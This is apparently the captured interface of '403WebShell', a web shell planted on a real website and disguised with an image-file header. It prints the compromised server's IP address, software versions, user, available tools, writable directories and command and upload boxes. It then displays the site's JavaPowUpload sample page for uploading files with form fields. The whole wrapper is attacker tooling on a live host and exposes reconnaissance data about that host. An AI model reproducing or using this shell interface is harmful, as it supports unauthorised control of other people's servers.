????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.notes-online.se/login/JavaPowUpload_old/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.notes-online.se/login/JavaPowUpload_old//uploadwithform.html
<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>Upload files with Form fields example</title>
	<link rel="stylesheet" href="styles.css">
</head>
<body>
Sample: <b>uploadwithform.html</b>&nbsp;&nbsp;<a href="javascript:location.reload(true);"><img border="0" src="images/refresh.png" width="16" height="16">&nbsp;Refresh frame</a>&nbsp;&nbsp;<a target="_parent" href="index.htm"><img border="0" src="images/home.png" width="16" height="16">&nbsp;Examples home</a><br/><br/>
<!-- text below wil be shown if JavaScript disabled at browser -->
 <span id="noscriptdiv" style="border:1px  solid #FF0000;display:block;padding:5px;margin-top:10px;margin-bottom:10px;text-align:left; background: #FDF2F2;color:#000;">Active Scripting (JavaScript) should be enabled in your 
							browser for this application to function properly!</span>
<script type="text/javascript">
	document.getElementById('noscriptdiv').style.visibility = 'hidden';
</script>
                    

The example shows the transferring form values (&lt;Form... &lt;input..)   together with uploaded files. The values can be transferred by GET or POST   methods.<br>
<br>
For the  example you need to specify script URL that accept the files. Open the example  in a text editor and specify the property value &quot;Upload.UploadUrl&quot; of  JavaPowUpload applet. The value can be: 
<ul>
  <li>For ASP: <code>FileProcessingScripts/ASP/ClearASP/uploadfiles.asp</code></li>
  <li>For PHP : <code>FileProcessingScripts/PHP/uploadfiles.php</code>&nbsp;<strong>(Default script)</strong></li>
  <li>For ASP.NET (C Sharp): <code>FileProcessingScripts/ASP.NET/CSharp/uploadfiles.aspx</code></li>
  <li>For ASP.NET (VB.NET): <code>FileProcessingScripts/ASP.NET/VBNET/uploadfiles.aspx</code></li>
   <li>For Perl : <code>FileProcessingScripts/PERL/uploadfiles.pl</code></li>
   <li>For Cold Fusion : <code>FileProcessingScripts/ColdFusion/uploadfiles.cfm</code></li>
   <li>For JSP : <code>FileProcessingScripts/JSP/uploadfiles.jsp</code></li>
</ul>
<script language="JavaScript">	
	function mysubmit()
	{
		var Java;					
		var FormObj = document.getElementById("myform");				
		var FormValues = '';
		
		Java = document.getElementById("JavaPowUpload");				
		Java.setParam("Upload.HttpUpload.FormName","myform");
		Java.setParam("Upload.HttpUpload.AddFormValuesToPostFields","false");				
		Java.setParam("Upload.HttpUpload.AddFormValuesToHeaders","false");
		Java.setParam("Upload.HttpUpload.AddFormValuesToQueryString","false");
		
		if(document.getElementById("getradio").checked)
			Java.setParam("Upload.HttpUpload.AddFormValuesToQueryString","true");	
		if(document.getElementById("postradio").checked)		
			Java.setParam("Upload.HttpUpload.AddFormValuesToPostFields","true");						
		if(document.getElementById("headradio").checked)				
			Java.setParam("Upload.HttpUpload.AddFormValuesToHeaders","true");
				
		Java.clickDownload();
		return false;
	}
</script>

<br><br>
		<applet 
  code="com.elementit.JavaPowUpload.Manager"
  archive="lib/JavaPowUpload.jar, lib/skinlf.jar,
	lib/commons-logging-1.1.jar,
	lib/commons-httpclient-3.1-rc1.jar,
	lib/commons-codec-1.3.jar"
  width="350"
  height="200"
  name="JavaPowUpload"
  id="JavaPowUpload"
  mayscript="true"
  alt="JavaPowUpload by www.element-it.com"
  VIEWASTEXT>

 <!-- Java Plug-In Options -->
<param name="Common.SerialNumber" value="">
 <param name="progressbar" value="true">
 <param name="boxmessage" value="Loading JavaPowUpload Applet ...">
 <!--Enable upload mode -->
 <param name="Common.UploadMode" value="true">
 <!--Enable JavaPowUpload events and functions to use in JavaScript -->
 <param name="Common.UseLiveConnect" value="true"> 
 <!--Set url to file processing script -->
 <param name="Upload.UploadUrl" value="FileProcessingScripts/PHP/uploadfiles.php"> 
 <!--Hide download button. So, user can start uplod process only by pressing html button-->
 <param name="Common.ProgressArea.DownloadButton.Visible" value="false"> 
 <param name="Common.SkinLF.ThemepackURL" value="lib/themepack.zip">
 <!-- This text will be shown if applet not working or Java not installed-->
 <span style="border:1px  solid #FF0000;display:block;padding:5px;margin-top:10px;margin-bottom:10px;text-align:left; background: #FDF2F2;color:#000;">You should <b>enable applets</b> running at browser and to have the <b>Java</b> (JRE) version &gt;= 1.5.<br />If applet is not displaying properly, please check <a target="_blank" href="http://java.com/en/download/help/testvm.xml" title="Check Java applets">additional configurations</a></span>
 </applet>


<p>
  Pass Form fiedls by:<br>
  <label>
  <input name="method" type="radio" id="getradio" value="get" />
   GET method </label>
  <br />
  <label>
  <input name="method" type="radio" id="postradio" value="post" checked="checked" />
    POST method </label>
   <br />
  <label>
  <input name="method" type="radio" id="headradio" value="head" />
    Headers </label>
</p>

<form method="POST" onSubmit="return mysubmit();" id="myform" name="myform" action="">
 Form fields:<br> 
    <select name="menu">
        <option value="1">some menu item 1</option>
        <option value="2">some menu item 2</option>
    </select>
    <input name="text" type="text" value="some text">
   
    <br>    
    <input name="submitbtn" onClick="return mysubmit();" type="submit" value="Upload" >    
</form>
<br />
<script type="text/javascript">	
	function JavaPowUpload_onServerResponse(status, response)
	{
		var responselable = document.getElementById("serverresponse");
		responselable.innerHTML = "Response code " + status;
		responselable.innerHTML += "<br>" + response;		
	}	
	
</script>
<br/>
<b>You should see server reponse below when upload complete. </b><br/>
<div id="serverresponse">&nbsp;</div>
The file uploader doesn’t work? See <a target="_blank" href="http://www.element-it.com/OnlineHelpJavaPowUpload/Troubleshooting.html">here</a> what you need for its proper work. 
<br /><br />
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit